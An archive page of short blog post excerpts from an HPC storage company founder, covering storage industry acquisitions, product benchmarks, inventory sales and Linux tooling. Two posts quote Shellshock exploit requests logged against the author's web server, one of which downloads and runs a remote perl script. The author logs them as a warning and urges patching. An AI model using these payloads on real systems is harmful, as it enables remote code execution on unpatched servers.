see for more details. I’d love to find a valid reason to play with it, but my near term foci are going to remain our current code base in Perl/C, nodejs for a few things, Julia/R for analysis. The joke about Perl 6 shipping by Christmas is now over … as the correct response has been “what year”. Until this year it seems.
Posts
M&A: Cleversafe is snarfed up by IBM
Cleversafe was acquired by IBM. Looks like 200 people making their way over. This is huge, as now Scality is basically the last independent standing, and I am guessing they won’t be alone for long.
Posts
As the benchmark cooks
We are involved in a fairly large benchmark for a potential customer. I won’t go into many specifics, though I should note that lots of our Unison units are involved. Current architecture has 5 storage nodes (6th was temporarily removed to handle a customer issue). Each Unison node has a pair of 56GbE NICs, as well as our appliance OS, and bunches of other goodness (quite a bit of flash). Total capacity for test is of order 200TB of flash.
Posts
Inventory to sell to make room: Cadence and several Unison/JackRabbits
Very fast units, very reasonable prices. We are (again) running out of space in our lab, and really need to move this stuff out. Many of these have been demo/engineering machines for us, including the portable petabyte unit. We’ve got a Cadence box with 16TB of storage, which puts up performance numbers that other vendors would kill for …
https://twitter.com/sijoe/status/606221680533508096
and
https://twitter.com/sijoe/status/606222084587388928
We’ve got the portable petabyte unit available (albeit with less than 1 PB).
Posts
Unison Ceph beats reference architecture, including the flavor with NVMe drives
The paper is here. We focused on our product mix and the rough comparables in the report. Our units are immediately available as well, preloaded/preconfigured with Ceph. The takeaway is this:
[ ](https://scalableinformatics.com/assets/documents/Unison-Ceph-Performance.pdf)
Whats really interesting in this is that the 36+2 reference architecture makes use of 2x NVMe drives. And as you can see, they really don’t help much in the tests. This is not to say NVMe is bad; its not.
Posts
Nominate your favorite HPC product and company for a readers choice award
Please go here and nominate! Last year, our customer Lucera, won best in Financial Services. We built the vast majority of their infrastructure, so we like to think we contributed in some manner to their success. This year, please don’t hesitate to nominate us (or second/third/etc.) for Best HPC Storage Product of Technology for Scalable Informatics Unison product, or whatever you’d like. In addition to the nomination for Unison in storage, I put in nominations for Cadence in Financial Services, and in Data Intensive computing.
Posts
M&A: Seagate snarfs up DotHill
The Register reports this morning, that Seagate has acquired DotHill. DotHill makes arrays and their kit is resold and rebadged by many. In general the array market (high end) is in a decline, and doesn’t show signs of turning around (ever). The low and mid market, including some of the cloud bits is growing. I am not sure about the OCP stuff, but the low end bits are where we are seeing 4, 8, and 12 drive arrays show up as completely commoditized gear.
Posts
IPO: Pure Storage files
Not really an HPC/Big Data play (yet). But they have filed. The traditional array market is in a decline, and depending upon how you view it, its either merely a steep decline, or an out-and-out death spiral. The tier1 vendors are defending a shrinking turf against aggressive smaller and more focused players. Moreover, flash is set to overtake disk in terms of lower cost to deploy in very short order. This plays well for folks like Pure and a few others, though the market they are playing in is in decline.
Posts
rebuilding our kernel build system for fun and profit
No, really mostly to clean up an accumulation of technical debt that was really bugging the heck out of me. I like Makefiles and I cannot lie. So I like encoding lots of things in them. But it wound up hardwiring a number of things that shouldn’t have been hardwired. And made the builds brittle. When you have 2 released/supported kernels, and a handful of experimental kernels, it gets hard making changes that will be properly reflected across the set.
Posts
Drama at Violin Memory
Violin has had a rather tumultuous time in market. Post IPO, they’ve not had a great time selling. They have an interesting product, but with SanDisk coming out with their kit, and many others in the competitive flash array space, this can’t be a fun time for them. They don’t have a large installed base to protect, and their competitors are numerous and fairly well funded. Add to the mix that, as a post-IPO public company, they no longer have the luxury of not hitting targets … they will get slaughtered in the market.
Posts
Build debugging thoughts
Our toolchain that we use for providing up to date and bug-reduced versions of various tools for our appliances have a number of internal testing suites. These suites do a pretty good job of exercising code. When you build Perl, and the internal modules and tools, tests are done right then and there, as part of the module installation. Sadly not many languages do this yet, I think Julia, R, and a few others might.
Posts
Insanely awesome project and product
This is one of Scalable Informatics FastPath Unison systems, well the bottom part. The top are clients we are using to test with.
[ ](/images/flashy.jpg)
Each of the servers at the bottom is a 4U with 54 physical 2.5 inch 6g/12g SAS or SATA SSDs. We have 5 of these units in the picture. And a number of SSDs on the way to fill them up. Think 0.2PB usable of flash.
Posts
Playing "guess which wire I just pulled" isn't fun
Even less fun when the boxes are half a world away. Yeah, this was my weekend and a large chunk of today. This will segue into another post on design and (unintended) changes in design, and end user expectations at some point. Its hard to maintain a concept of an SLO if some of the underlying technology you are relying upon to deliver these objectives (like, I dunno, a wire?), suddenly disappears on you.
Posts
On storage unicorns and their likely survival or implosion
The Register has a great article on storage unicorns. Unicorns are not necessarily mythical creatures in this context, but very high valuation companies that appear to defy “standard” valuation norms, and hold onto their private status longer than those in the past. That is, they aren’t in a rush to IPO or get acquired.
The article goes on to analyze the “storage” unicorns, those in the “storage” field. They admix storage, nosql, hyperconverged, and storage as a service.
Posts
Tools for linux devops: lsbond.pl
Slowly and surely, I am scratching the itches I’ve had for a while with regards to data extraction from a running system. One of the big issues I deal with all the time is to extract what the state and components (and their states) of a linux network bond. Its an annoying combination of /sys/class/net, /proc/net/bonding/, and ethtool/ip commands. So I decided to simplify it.
bond0: mac 00:11:22:33:44:55 state up mode load balancing (xor) xmit_hash layer2+3 (2) polling 100 ms up_delay 200 ms down_delay 200 ms ipv4 10.
Posts
Day job growing
We brought on a new business development and sales manager today. Actually based in Michigan. Looking forward to great things from him, and we are all pretty excited!
Posts
Baidu attack deflection
So Baidu’s web crawler is broken. Makes the bad old days of bing bot look positively benign. Wasn’t pushing much load, but lots of log spam and it showed signs of increasing over time. So, out comes the ban hammer. Then I thought, why not report their broken bot to them. Should be as simple as an email, or a web page. Sure enough, they have links for filling out forms to indicate that their web crawler is going crazy.
Posts
M&A or more correctly, acqui-hire: Cray bags much of Terascala
Terascala appears to have been disassembled, with much of the team going to Cray. Terascala started out selling internally developed storage appliances for Lustre. They developed deployment, monitoring, and management tools. Their UI was reasonably good. Then they struck up a deal with Dell and a few others. In doing so, they largely stopped their appliance sales. Put their code upon their partners hardware. This did generate more force multipliers for them in sales, but it cost them some of their differentiation … unless their boxes were entirely undifferentiated, where it would reduce their overall costs to avoid selling undifferentiated hardware.
Posts
Potential M&A: Micron being pursued
I was heads down all day yesterday working on a few things. Apparently this is widely known now, but I saw it late last night. Micron is being pursued by a group affiliated with Tsinghua University. There is a political angle to this group, as they are connected to the government through their management. Why is this interesting (the acquisition potential that is). Well, there are 4 basic Flash fabs out there these days.
Posts
Fixing Baidu's broken search bot
It seems that the bot was generating some effectively random broken URLs. Or maybe not so random. I saw endpoints in the logs that haven’t been in use for at least 7 years. I can’t imagine this was simply a harmless bug, as much as … maybe? … a search for moved/renamed endpoints? As the web server is now done very differently than in the past, the missing endpoints merely generated log spam.
Posts
Blog post title of the day ... Any Sufficiently Advanced Technology ...
I am a huge fan of Charles Stross’s (@cstross) Laundry series (and most of what he writes in general), and just finished his latest over the weekend. Up on his blog, he had a guest author write a post while he was stuck in traffic or similar. The title of the entry wins the internets today.
Yup, definitely a winner …
Posts
Most of our traffic on the day job site now comes from Baidu
Well, their web crawler. Way way back in the day, I complained about broken bing-bots. This was 8 years ago. Bing was fairly crappy at crawling, and seems to have improved. Google is still the lightest touch. Least impactful. Deeply in the traffic noise. Not Baidu. There bot is, for lack of a better term, broken. Its not into DoS levels, but it is wasting traffic/resources, and providing lots of log spam.
Posts
Imitation and repetition is a sincere form of flattery
A few years ago, we demonstrated some truly awesome capability in single racks and on single machines. We had one of our units (now at a customer site), specifically the unit that set all those STAC M3 records, showing this:
and a rack of our units (now providing high performance cloud service at a customer site)
for 8k random reads across 0.25 PB of storage on a very fast 40GbE backbone.
Posts
Portable PetaByte systems update
As a reminder, the day job has 1PB dense and fast (20GB/s and above)storage systems available for about $0.25/GB fully supported, delivered, and installed. All you need to provide is power and a network connection. I should note that we’ve delivered all flash versions of these as well as hybrid versions for various use cases. We will have an update on these leveraging our greater density options, including 2.3PB/rack fully supported for 3 years, with shipping and installation for under $600k USD, as well as a 1PB flash version in 1-2 racks.
Posts
takes a licking and keeps on ticking
One of our systems at a customer site.
$ uptime 15:47:33 up 407 days, 3:23, 2 users, load average: 0.19, 0.10, 0.06 $ uname -r 3.10.36.scalable
Posts
A new thing to occupy my time
Doesn’t have to be a code golf mechanism, but this looks like fun!
Posts
Thoughts on a Thursday
We’ve been doing the startup thing for a hair under 13 years now. Most of the time we’ve been self funded, and recently we took a small investment in a friends and family round (angel.co link here). What occurs to me, after we soft announced our 100GbE results via a Mellanox PR today, is that we’ve been building the types of high performance platforms that enable end users to do bigger and better things for the whole time.
Posts
Interesting conversation with a customer about our siRouter
They are turning their SDN concept into one of the most incredible technologies around, a tremendous competitive advantage for them over others in their space. I had been under the impression that they were running everything on their (quite awesome) 10/40GbE switches. These are SDN capable switches from a very well funded SDN switch startup. Turns out, their SDN stack is actually running on siRouter. They are doing some very cool bits on the software stack side, and getting about 2 microseconds port to port.
Posts
Our 100GbE flash storage appliance benchmarks discussed
See the PR bit here (http://www.hpcwire.com/off-the-wire/new-mellanox-performance-benchmarks-released/ for the link impaired) This is a Unison Ceph appliance ( http://scalableinformatics.com/unison ) and they are available and shipping now. Please reach out to us if you’d like to discuss. And yes, this is the world’s first 100GbE storage appliance, or storage server SAN device if you prefer. Easily one of the fastest systems in market. [Update] Forgot to mention, this is a set of units bought by a customer, and at their site.
Posts
Day job is hiring
Business development/sales role for now. See here (url: https://scalableinformatics.com/bus-dev in case you don’t see the link) for more details. Prefer New York, Chicago, Boston, or nearby. No relocation.
Posts
SIOS v2.0 running pxe booted
Our SIOS (Linux based OS, usually based upon Debian) has just been updated for jessie (Debian 8). This was necessary to support rkt, docker, etc. in addition to our other bits. Its been cooking in the background for a while, for, as you might have noticed from my posting frequency, I’ve been busy. But we are up, and running. Base distro version here:
root@usn-ramboot:~# df -h Filesystem Size Used Avail Use% Mounted on tmpfs 8.
Posts
Off to Chicago for The Trading Show
Looking forward to our booth #243 at the Trading Show in Chicago. We’ll have a FastPath Cadence time series analytics unit with us. Should be fun!
Posts
M&A: Avago grabbed Broadcom, Intel grabs Altera
Avago continues its acquisition spree. Broadcom (network chipsets and NPUs, CPUs, etc.). This is looking like a more integrated semiconductor IP play here. They grabbed LSI, and shed the non-chippery bits. They grabbed PLX. And Emulex. As they say, curiouser and curiouser. This makes perfect sense to me, and given the other acquisition announced today, I am going to bet they will be talking (at least) to Xilinx. And then there’s Intel.
Posts
Massive, Unapologetic Firepower: part 3, the network
Take the worlds fastest hyperconverged storage-compute server. Mix into this the worlds fastest networking. What do you get? (hint: something you can order today)
~# iperf -c 192.168.1.1 -l128k -w 512k -P10 -t 4 ------------------------------------------------------------ Client connecting to 192.168.1.1, TCP port 5001 TCP window size: 1.00 MByte (WARNING: requested 512 KByte) ------------------------------------------------------------ [ 11] local 192.168.1.2 port 50804 connected with 192.168.1.1 port 5001 [ 4] local 192.168.1.2 port 50796 connected with 192.
Posts
Been heads down working very hard on something very cool
More soon. We’ll post here, with some basic results. Insanely cool stuff.
Posts
Booth at BioIT World 15 in Boston
Should be fun, we will have booth (#461) on the side near the thoroughfare for the talks. Our HPC on Wall Street booth looked like this:
[ ](/images/HPConWS-booth-spring2015.jpg)
The display on the monitor is from our FastPath Cadence machine, and is part of the performance dashboard, built upon InfluxDB, Grafana, sios-metrics, and influxdbcli. Here is a blown up view, note the vertical axes for BW (GB/s) and IOPs.
[ ](/images/cadence-dash-spring2015.jpg)
Posts
Nebula shuts down
Nebula, a cloud “appliance” (and company) has shut down. The software is open source, so their customers can pay others to provide support, or migrate to another stack. This isn’t a public cloud company, rather a private cloud company. There is little operational risk in moving from one openstack build to another. Feel free to reach out to me (landman @ scalability.org) privately if you need to speak to someone about this.
Posts
M&A: Convey snapped up by Micron
Rich at InsideHPC has the story. There is a good fit for Micron, as they are rapidly turning into one of the stronger players in the space. As I had noted, the storage OEMs are either buying into vertical integration or partnering to make it happen. Convey is actually a natural fit given other of Micron’s projects. The big question is, for the OEMs not going this route, or waiting to go this route, will that strategy work?
Posts
Announcement of new storage appliance
More information in our video (linked here in case the video doesn’t embed properly, you may need to enable flash and scripting on the page to see it embed*). Also, check out the page at the day job:
we don’t do google or other analytics (just local stuff here), so this shouldn’t be a security issue. Let us know if you believe otherwise.
Posts
M&A: Blekko grabbed by IBM for Watson
Have a look at the page. Blekko was started by a number of people including Greg Lindahl having spent many years in the HPC world. He’s another recovering physical scientist (astronomer as I remember). This is interesting as it gives a sense as to where IBM sees its future. They aren’t (it looks like to me) trying to compete with google, rather, trying to add interesting capability to Watson. They see Watson and things derived from it as their future.
Posts
The worlds fastest hyper-converged appliance is faster and more affordable than ever
This is a very exciting hyper-converged system, representing our next generation of time series, and big data analytical systems. Tremendous internal bandwidths coupled with massive internal parallelism, and minimal latency design on networks. This unit has been designed to focus upon delivering the maximal performance possible in an as minimal footprint … both rack based and cost wise … as possible. You can use these as independent stand alone units, integrate them into a larger FastPath Unison system We have our software stack (SIOS) integrated onto each unit, and include our builds of Python + Pandas/SciPy/NumPy, R, and Perl.
Posts
Interesting Q1 so far for day job
Our Q1 is usually quiet, fairly low key. Not this one. Looks like lots of pent up demand. We are deep into record territory, running 200+% of normal, with possibility of more. Another new wrinkle is that our small investment round is mostly complete. This is new territory for us, and you may have noticed I’d backed off posting intensity over the last half year or so while this was going on.
Posts
Π day has come
I like Π … apple, cherry, etc. For those whom don’t get the pun, dates in the US are often written as Month/Day/Year, with year being abbreviated by 2 digits. So with this formatting, today is 3/14/15, or roughly the first 5 digits of Π, which is defined to be the ratio of circumference to diameter of circle on a 2D plane. You can extend the pun, by noting at 9:26.
Posts
A completely unsolved problem
contact management across multiple devices/OSes/applications. Yeah, I know, just use iCloud/Gmail/etc. Except they are all broken. And not a little bit. I rely upon one, consistent, correct contact list that has email, phone, etc. for all the people I know and communicate with. In years past, I’ve had this list sync back and forth to Gmail via google. And it used to work. Then iPhone5 and well, ya know, it broke.
Posts
Scalable Informatics customer Milford Film and Animation does awesome projects
Its nice to hear success stories from our customers. In this case, our friends and customers at Milford Film and Animation have been using our systems for a number of years to provide the basis for their storage efforts. Their systems are very computationally, network, and IO intensive. There is a tremendous amount of rendering, editing, and many other things that require absolutely the highest performance you can get in a dense package.
Posts
My vote for most awesome Mac OSX software
Karabiner If you switch back and forth between Linux and Mac on same keyboard, this is an absolute must have. From my perspective, the keys in Mac are horribly borked. Home and End do not do what I expect. Control-Anything doesn’t work except in exceptional cases. iTerm2 (also very good Mac software) largely does the right thing on its own, but the keyboard side of MacOSX is basically borked. This lets you unbork it.
Posts
Memory channel flash: is it over?
[full disclosure: day job has a relationship with Diablo] Russell just pointed this out to me. The short (pedestrian) version (I’ve got no information that is not public, so I can’t disclose something I don’t know anyway): Netlist filed a patent infringement suit against Diablo, and then included SanDisk as they bought Smart Storage, whom worked with Diablo prior to Smart being acquired by SanDisk. Netlist appears to have won an, at least temporary, injunction against Diablo.
Posts
New all-flash-array: SanDisk's Infiniflash
Interesting development from SanDisk. Not quite an M&A; bit, but an attempt at accelerating adoption of non-spinning storage by bringing out a proof of concept product in a few flavors. They are aiming at $2/GB for this system. This is an array product though, so you need to attach it to a set of servers. Also, for something this large, the spec’s are kind of disappointing. 7GB/s maximum and 1M IOPs.
Posts
M&A: HGST acquires Amplidata
This is closer to home. Amplidata is an erasure coded cold storage system atop “cheap” hardware. HGST makes, of course, storage devices. This continues a trend in vertical integration of folks with systems experience, and folks who make the things that go into these systems. If you control more of the stack, you can create more value to your bottom line … up to a point. The flip side to this is if you start competing with your customers.
Posts
M&A Avago (the LSI acquirers) just bought Emulex
Ok, this is starting to look like someone is buying up the tech behind storage and storage networking on the hardware side. Avago acquired LSI in 2013, and now they’ve done and grabbed Emulex. Emulex has a large FC capability, but I can’t imagine that this is the only reason for this buy. They also have converged network adapters, RDMA and offload capability, and other bits. They are an OEM to many large vendors.
Posts
Real measurement is hard
I had hinted at this last week, so I figure I better finish working on this and get it posted already. The previous bit with language choice wakeup was about the cost of Foreign Function Interfaces, and how well they were implemented. For many years I had honestly not looked as closely at Python as I should have. I’ve done some work in it, but Perl has been my go-to language.
Posts
When the revolution hits in force ...
Our machines will be there, helping power the genomics pipelines to tremendous performance. Performance is an enabling feature. Without it you cannot even begin to hope to perform massive scale analytics. With it, you can dream impossible dreams. This article came out talking about a massive performance analytics pipeline at Nationwide Children’s Hospital in Ohio. This pipeline runs on a cluster attached to Scalable Informatics FastPath Unison storage. This is a very dense, very fast system, interconnected with Mellanox FDR Infiniband, Chelsio 40GbE, and leveraging BeeGFS from thinkparq.
Posts
Hype at the speed of hype, or big data marketing and media
There was a great post on the marketing of big data by John Foreman on his blog. I found it a very enjoyable read for one … and it showed that hype is a self-similar phenomenon. No matter what topic it is in, some people will try to generate and exploit the generated hype, regardless of the true information content associated with it. I could shake my head, but I’ve seen this, many times over my career.
Posts
Shakes head, chuckles ... yeah, we couldn't see that one coming ...
Just to get this out of the way, apart from this ideologically and politically charged debasement of real science, I am and remain firmly a “believer”* that the earths climate has changed, has been changing, will change, and continue to change with or without our input. Moreover, our climate has gone through some remarkable changes over its existence, all lovingly preserved in one way or another in the fossil record, and through mechanisms that effectively store state of a system.
Posts
Coraid may be going down
According to The Register. No real differentiation (AoE isn’t that good, and the Seagate/Hitachi network drives are going to completely obviate the need for such things). We once used and sold Coraid to a customer. The linux client side wasn’t stable. iSCSI was coming up and was actually quite a bit better. We moved over to it. This was during our build vs buy phase. We weren’t sure if we could build a better box.
Posts
The Interview (no, not that one!)
Rich at InsideHPC.com (you do read it daily, don’t you?) just posted our (long) interview from SC14. Have a look at it here (http://insidehpc.com/2015/01/video-scalable-informatics-steps-io-sc14/) . As a reminder, Portable PetaBytes are for sale! And yes, the response has been quite good … More soon … And no, we aren’t going to hack anyone
Posts
Micro, Meso, and Macro shifts
The day job lives at a crossroads of sorts. We design, build, sell, and support some of the fastest hyperconverged (aka tightly coupled) storage and computing systems in market. We’ve been talking about this model for more than a decade, and interestingly, the market for this has really taken off over the last 12 months. The idea is very simple. Keep computing, networking, and storage very tightly tied together, and enable applications to leverage the local (and distributed) resources at the best possible speed.
Posts
Inventory reduction @scalableinfo
Its that time of year, when the inventory fairies come out and begin their counting. Math isn’t hard, but the day job would like a faster and easier count this year. So, the day job is working on selling off existing inventory. We have 4 units ready to go out the door to anyone in need of 70-144TB usable storage at 5-6 GB/s per unit. Specs are as follows:
16-24 processor cores 128 GB RAM 48x {2,3,4} TB top mount drives 4x rear mount SSDs (OS/metadata cache) Scalable OS (Debian Wheezy based Linux OS) 3 year warranty As this is inventory reduction, the more inventory you take, the happier we are (and the less work that the inventory fairies have to do).
Posts
The #PortablePetaByte : Coming to a data center near you!
As seen at SC14. We have our Portable PetaByte systems available for sale. Half rack to many racks, 1 PB and upwards, 20GB/s and up. Faster with SSDs. See the link above!
Posts
Starting to come around to the idea that swap in any form, is evil
Here’s the basic theory behind swap space. Memory is expensive, disk is cheap. Only use the faster memory for active things, and aggressively swap out the less used things. This provides a virtual address space larger than physical/logical memory. Great, right? No. Heres why.
swap makes the assumption that you can always write/read to persistent memory (disk/swap). It never assumes persistent memory could have a failure. Hence, if some amount of paged data on disk suddenly disappeared, well … Put another way, it increases your failure likelihood, by involving components with higher probability of failure into a pathway which assumes no failure.
Posts
#sc14 T-minus 2 days and counting #HPCmatters
On the plane down to NOLA. Going to do booth setup, and then network/machine/demo setup. We’ll have a demo visualfx reel from a customer whom uses Scalable Informatics JackRabbit, DeltaV (and as the result of an upgrade yesterday), Unison. Looking forward to getting everything going, and it will be good to see everyone at the show!
Posts
30TB flash disk, Parallel File System, massive network connectivity
This will be fun to watch run …
Scalable Informatics FastPath Unison for the win!
Posts
SC14 T minus 6 and counting
Scalable’s booth is #3053. We’ll have some good stuff, demos, talks, and people there. And coffee. Gotta have the coffee. More soon, come by and visit us!
Posts
Mixing programming languages for fun and profit
I’ve been looking for a simple HTML5-ish way to represent our disk drives in our Unison units. I’ve been looking for some simple drawing libraries in javascript to make this higher level, so I don’t have to handle all the low level HTML5 bits. I played with Raphael and a few others (including paper.js). I wound up implementing something in Raphael.
The code that generated this was a little unwieldly … as javascript doesn’t quite have all the constructs one might expect from a modern language.
Posts
turnkey, low cost and high density 1PB usable at 20+ GB/s sustained
Fully turnkey, we’d ship a rack with everything pre-installed/configured. Some de-palletizing required, but its plug and play (power, disks) after that. More details, and a sign up to get a formal quote here. This would be in 24U of rack space for less than $0.18/raw GB or $0.26/usable GB. Single file system name space, a single mount point. Leverages BeeGFS, and we have VMs to provide CIFS/SMB access, as well as NFS access, in addition to BeeGFS native client.
Posts
Velocity matters
For the last decade plus, the day job has been preaching that performance is an advantage, a feature you need, a technological barrier for those with both inefficient infrastructures and built in resistance to address these issues. You find the latter usually at organizations with purchasing groups that dominate the users and the business owners. The advent of big data, (ok, this is what the second or third time around now) with data sets that have been pushing performance capabilities of infrastructure has been putting the exclamation point on this for the past few years.
Posts
A good read on a bootstrapped company
Zoho makes a number of things, including a CRM, that we use. And they are bootstrapped. Like us. There are significant market differences between us and them, but many of the things noted in the article are common truths.
If you don’t start with building a real company, you won’t have a real company. The decisions you make when your own ass is on the line are very different from the ones you might make if its someone elses ass, and money for that matter.
Posts
There are times
… when during a support call, we see the magnitude of the self-inflicted damage, and ask ourselves exactly why did they do this to themselves? Today was like this. We do what we can to protect people from the dangerous rapidly moving sharp objects underneath the hood (or boot). We abstract things, tell them not to put fingers near the spinny blades. Yes, its a metaphor. Today was a day of Pyrrhic victories.
Posts
massive unapologetic firepower part 2 ... the dashboard ...
For Scalable Informatics Unison product. The whole system:
[ ](/images/dash-2.png)
Watching writes go by:
[ ](/images/dash-3.png)
Note the sustained 40+ GB/s. This is a single rack sinking this data, and no SSDs in the bulk data storage path. This dashboard is part of the day job’s FastPath product.
Posts
... and the shell shock attempts continue ...
From 174.143.168.121 (174-143-168-121.static.cloud-ips.com)
Request: '() { :;}; /bin/bash -c "wget ellrich.com/legend.txt -O /tmp/.apache;killall -9 perl;perl /tmp/.apache;rm -rf /tmp/.apache"'
Posts
Updated boot tech in Scalable OS (SIOS)
This has been an itch we’ve been working on scratching a few different ways, and its very much related to forgoing distro based installers. Ok, first the back story. One of the things that has always annoyed me about installing systems has been the fundamental fragility of the OS drive. It doesn’t matter if its RAIDed in hardware/software. Its a pathway that can fail. And when it fails, all hell breaks loose.
Posts
That may be the fastest I've seen an exploit go from "theoretical" to "used"
Found in our web logs this afternoon. This is bash shellshock.
Request: '() {:;}; /bin/ping -c 1 104.131.0.69' This bad boy came from the University of Oklahoma, IP address 157.142.200.11 . The ping address 104.131.0.69 is something called shodan.io. Patch this one folks. Remote execution badness, and all that goes along with it.
Posts
Interesting bits around EMC
In the last few days, issues around EMC have become publicly known. EMC is the worlds largest and most profitable storage company, and has a federated group of businesses that are complementary to it. The CEO, Joe Tucci, is stepping down next year, and there is a succession “process” going on. Couple this to a fundamental shift in storage, from arrays to distributed tightly coupled server storage, such as Unison, which is problematic for their core business.
Posts
sios-metrics code now on github
See link for more details. It allows us to gather many metrics, saves them nicely in the database. This enables very rapid and simple data collection, even for complex data needs.
Posts
Solved the major socket bug ... and it was a layer 8 problem
I’d like to offer an excuse. But I can’t. It was one single missing newline. Just one. Missing. Newline. I changed my config file to use port 10000. I set up an nc listener on the remote host.
nc -k -l a.b.c.d 10000 Then I invoked the code. And the data showed up. Without a ()&(&%&$%*&(^ newline. That couldn’t possibly be it. Could it? No. Its way to freaking simple.
Posts
New monitoring tool, and a very subtle bug
I’ve been working on coding up some additional monitoring capability, and had an idea a long time ago for a very general monitoring concept. Nothing terribly original, not quite nagios, but something easier to use/deploy. Finally I decided to work on it today. The monitoring code talks to a graphite backend. Could talk to statsd, or other things. In this case, we are using the InfluxDB plugin for graphite. I wanted an insanely simple local data collector.
Posts
New 8TB and 10TB drives from HGST, fit nicely into Unison
The TL;DR version: Imagine 60x 8TB drives (480TB about 1/2 PB) in a 4U unit or 4.8PB in a rack. Now make those 10TB drives. 600TB in 4U. 6PB in a full rack. These are shingled drives, great for “cold” storage, object storage, etc. One of the many functions that Unison is used for. These aren’t really for standard POSIX file systems, as your read-modify-write length is of the order of a GB or so, on a per drive basis.
Posts
The Haswells are (officially) out
Great article summarizing information about them here. Of course, everyone and their brother put out press releases indicating that they would be supporting them. Rather than add to that cacophony (ok, just a little: All Scalable Informatics platforms are available with Haswell architecture, more details including benchies … soon …) we figured we’d let it die down, as the meaningful information will come from real user cases. Haswell is interesting for a number of reasons, not the least of which is 16 DPi/cycle, but fundamentally, its a more efficient/faster chip in many regards.
Posts
Be sure to vote for your favorites in the HPCWire readers choice awards
Scalable Informatics is nominated in
#12 for Best HPC storage product or technology, #20 Top supercomputing achievement which could be for this, this on a single storage box, or this this result , #21 Top 5 new products or technologies to watch for our Unison and #22 for Top 5 vendors to watch Our friends at Lucera are nominated for #4, Best use of HPC in financial services Please do vote for us and our friends at Lucera!
Posts
InfluxDB cli is up on github
I know there is a node version, and I did try it before I wrote my own. Actually, the reason I wrote my own was that I tried it and … well … Link is here. And yes, the readme is borked about 1/2 way through. Doesn’t quite show the formatting of the output quite right. Will try to fix over the weekend, as I move this a far more feature complete bit.
Posts
Time series databases for metrics part 2
So I’ve been working with influxdb for a while now, and have a working/credible cli for it. I’ll have to put it up on github soon. I am using it mostly as a graphite replacement, as its a compiled app versus a python code, and python isn’t terribly fast for this sort of work. We want to save lots of data, and do so with 1 second resolution. Imagine I want to save a 64 bit measurement, and I am gathering say 100 per second.
Posts
Have a nice cli for InfluxDB
I tried the nodejs version and … well … it was horrible. Basic things didn’t work. Made life very annoying. So, being a good engineering type, I wrote my own. It will be up on our site soon. Here’s an example
./influxdb-cli.pl --host 192.168.5.117 --user test --pass test --db metrics metrics> \list series
.----------------------------------. | series name | +----------------------------------+ | lightning.cpuload.avg1 | | lightning.cputotals.idle | | lightning.cputotals.irq | | lightning.
Posts
Scalable Informatics 12 year anniversary
I had forgotten to mention, but we hit our 12 year mark on the 1st of August. We’ve grown from a small “garage” based company (really “basement-based” in Michigan, as garages aren’t heated in winter, nor cooled in summer here), with one guy doing consulting, cluster system builds, tuning, benchmarking, white paper writing … to a 10 person outfit building the worlds fastest and densest tightly coupled storage and computing systems.
Posts
Time series databases and system metrics
I am working on updating our FastPath appliance web management/monitoring gui for the day job. Trying to push data into databases for later analysis. Many tools have been written on the collection side, statsd, fluentd, … and some are actually pretty cool. The concern for me is the way these tools express their analytical and storage opinions, which is done on the storage side. The data collection side isn’t an issue, if anything, its a breath of fresh air relative to what else I’ve seen.
Posts
The best thing one can do with the tuned system is
yum remove tuned tuned-utils This isn’t quite as bad as THP, but its close.
Posts
Soon ... 12g goodness in new chassis
This is one of our engineering prototypes that we had to clear space for. A couple of new features I’ll talk about soon, but you should know that these are 12g SAS machines (will do 6g SATA of course as well).
Front of unit:
[ ](/images/IMG_2330.JPG)
Note the new logo/hand bar. The rails are also brand new, and are set to enable easy slide in/out even with 100+ lbs of disk in them.
Posts
But ... GaAs is the material of the future ... and always will be ...
I read a note on IBM’s recent allocation of capital towards research projects. It had this tidbit in there:
Well, there are a range of III-V materials. Not just GaAs. One of the big issues is the lattice mis-match between SI and many of the III-V material. This strain introduces “artifacts” in the bandstructure, not to mention structural morphologies. This said, those artifacts may be what the engineers want. Aluminum Phosphate and Gallium Phosphate are pretty well matched to SI.
Posts
Too simple to be wrong
I’ve been exercising my mad-programming skillz for a while on a variety of things. I got it in my head to port the benchmarks posted on julialang.org to perl a while ago, so I’ve been working on this in the background for a few weeks. I also plan, at some point, to rewrite them in q/kdb+, as I’ve been really wanting to spend more time with it. The benchmarks aren’t hard to rewrite.
Posts
OS and distro as a detail of a VM/container
An interesting debate came about on Beowulf list. Basically, someone asked if they could use Gentoo as a distro for building a cluster, after seeing a post from someone whom did something similar. The answer of course is “yes”, with the more detailed answer being that you use what you need to build the cluster and provide the cycles that you or your users will consume. Hey, look, if someone really, truly wants to run their DOS application, Tiburon/Scalable OS will boot it.
Posts
Scratching my head over a weird bonding issue
Trying to set up a channel bond into a 10GbE LAG. Set up bonding module, use the ‘miimon=200 mode=802.3ad’ options. The switch was sending LACP packets, 1/sec to the NICs. The NICs bond formed. But it didn’t seem to negotiate the LACP circuit correctly with the switch. The switch never registered it. I’ve not seen that one before. With Mellanox, Arista, Cisco, others like that, the LACP circuit forms correctly and quickly.
Posts
New customers
We have a number of nice new customers that have been absorbing about all of my time for the last few weeks. This is goodness. One has our current generation FastPath Cadence SSD converged computing and storage system, and will be running kdb+ on it. Another has a 1PB Unison parallel file system, and while we did the previous 2TB write in 73 seconds with it, we did some tuning and tweaking and are down to 68 seconds.
Posts
M&A: PLX snarfed by ... Avago ?
Ok, didn’t see this acquirer coming, but PLX being bought … yeah, this makes sense. Avago looks like they are trying to become the glue between systems, whether the glue is a data storage fabric, or communications fabric, etc. PLX makes PCIe switches and other kit. PCIe switch and interconnection is the direction that many are converging to. Best end to end latencies, best per-lane performance, no protocol stack silliness to deal with.
Posts
M&A: SanDisk snarfs FusionIO for $1.1B USD
This is only the beginning folks … only the beginning. See this. FusionIO was, quite arguably, in trouble. They needed a buyer to take them to the next level, and to avoid being made completely irrelevant. SanDisk is a natural partner for them. They have the fab and chips, FusionIO has a product. SanDisk has a vision for a flash-only data center. What’s interesting about this is that Fusion was sort of the last independent enterprise class PCI Flash vendors.
Posts
Selling inventory to clear space
[Update 16-June] We’ve sold the 64 bay FastPath Cadence (siFlash based) , and now we have a few more 60 bay hybrid Ceph and FhGFS units, as well as a 48 bay front mount siFlash. Whats coming in are many of our next gen 60 bay units, with a new backplane design, and we want to start running benchmarks with them ASAP. As we have limited space in our facility, we gotta make hard choices … Email me (landman@scalableinformatics.
Posts
Divestment: Violin sells off PCIe flash card
